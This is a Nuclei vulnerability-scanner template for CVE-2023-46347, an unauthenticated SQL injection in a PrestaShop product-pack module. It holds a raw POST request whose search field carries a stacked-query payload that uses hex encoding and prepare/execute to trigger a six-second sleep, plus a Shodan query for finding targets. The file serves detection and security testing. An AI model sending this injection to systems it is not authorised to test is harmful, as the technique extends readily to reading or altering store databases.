nuclei-templates/http/cves/2023/CVE-2023-46347.yaml

48 lines
1.7 KiB
YAML

id: CVE-2023-46347
info:
name: PrestaShop Step by Step products Pack - SQL Injection
author: MaStErChO
severity: critical
description: |
In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.
reference:
- https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html
- https://stack.chaitin.com/poc/detail/3977
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-46347
cwe-id: CWE-89
epss-score: 0.04018
epss-percentile: 0.92057
cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:*
metadata:
verified: true
max-request: 1
vendor: ndkdesign
product: ndk_steppingpack
framework: prestashop
shodan-query: http.component:"prestashop"
tags: time-based-sqli,cve,cve2023,sqli,prestashop,ndk_steppingpack,ndkdesign
http:
- raw:
- |
@timeout: 10s
POST /modules/ndk_steppingpack/search-result.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;--
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(content_type, "text/html")'
- 'contains(header, "PrestaShop")'
condition: and
# digest: 4a0a00473045022100f5a7016d1ee75ace061990e70fa579a51ec5a2f85fca7837036510855affb4ed022072869778eb02a316a25d7e2100e5a605f1d7a36968887563d771db4c6a8f3532:922c64590222798bb761d5b6d8e72950